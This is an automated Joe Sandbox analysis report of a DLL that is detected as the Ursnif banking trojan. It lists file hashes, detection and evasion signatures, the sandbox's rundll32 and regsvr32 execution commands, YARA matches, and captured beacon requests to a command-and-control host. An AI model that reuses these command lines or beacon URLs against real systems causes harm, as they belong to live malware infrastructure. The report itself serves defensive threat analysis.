Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report MGrYFpGLQ7.dll

Overview

General Information

Sample Name:MGrYFpGLQ7.dll
Analysis ID:481120
MD5:8c7b2ff105963718fa3c26989e206041
SHA1:831ece0ae6b5e2f373f75352e582abd61b5dd0d7
SHA256:90d8648b2aac0c837286a4c042f02064cfbb12f45b3dc6b00b2beccc7fc35422
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Found stalling execution ending in API Sleep call
Writes or reads registry keys via WMI
Writes registry values via WMI
Machine Learning detection for sample
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2880 cmdline: loaddll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3428 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5040 cmdline: rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3556 cmdline: regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 4728 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6320 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6424 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6432 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82954 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 7140 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82976 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17438 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6396 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83004 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17452 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5704 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83036 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6020 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17470 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 2624 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Bighearted MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5352 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Soaking MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6276 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Turnipy MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6536 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Watertight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6708 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Dithery MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7000 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anhimae MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1496 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anostraca MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2964 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1068 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anaerobian MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6372 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Sparsile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5908 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 86 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: MGrYFpGLQ7.dllAvira: detected
            Multi AV Scanner detection for submitted fileShow sources
            Source: MGrYFpGLQ7.dllVirustotal: Detection: 82%Perma Link
            Source: MGrYFpGLQ7.dllMetadefender: Detection: 59%Perma Link
            Source: MGrYFpGLQ7.dllReversingLabs: Detection: 88%
            Machine Learning detection for sampleShow sources
            Source: MGrYFpGLQ7.dllJoe Sandbox ML: detected
            Source: 3.2.rundll32.exe.510000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 2.2.regsvr32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 0.2.loaddll32.exe.5f0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: MGrYFpGLQ7.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49820 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49819 version: TLS 1.2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00C732BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_040832BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_040832BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047B32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,6_2_047B32BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BF32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,9_2_04BF32BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C032BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,12_2_04C032BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_043532BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,16_2_043532BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_067732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,18_2_067732BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04FD32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,21_2_04FD32BA

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49859 -> 13.225.29.132:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49859 -> 13.225.29.132:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49863 -> 13.225.29.132:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49907 -> 13.225.29.132:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49907 -> 13.225.29.132:80
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: geolocation.onetrust.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: s.yimg.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49820 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49819 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314475815.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367003924.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391468389.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370680495.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311090164.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313451317.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370551662.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391668872.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314245766.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391696489.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391496685.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355040596.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314318653.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311152381.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391727857.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311865061.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311345831.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391695930.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.311422020.0000000006CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.370336241.0000000006AE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311203958.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.313929901.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311769510.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311540194.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314268795.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355268021.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.361195316.00000000074A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391358945.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370621844.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311670564.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313872965.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391766298.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311984449.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.312268208.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314181933.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391634804.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313395188.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366812647.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355464241.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366846077.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370930604.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.528368895.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.525372552.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311633818.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.328237107.0000000005588000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.526965041.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366987894.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370755681.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370579660.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366907200.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391783104.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391671709.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366961006.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366875687.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391794887.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370911517.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391596036.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370793730.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367026517.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314475815.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367003924.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391468389.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370680495.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311090164.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313451317.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370551662.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391668872.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314245766.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391696489.0000000007088000.00000004.00000040.sdmp, type: MEMORY
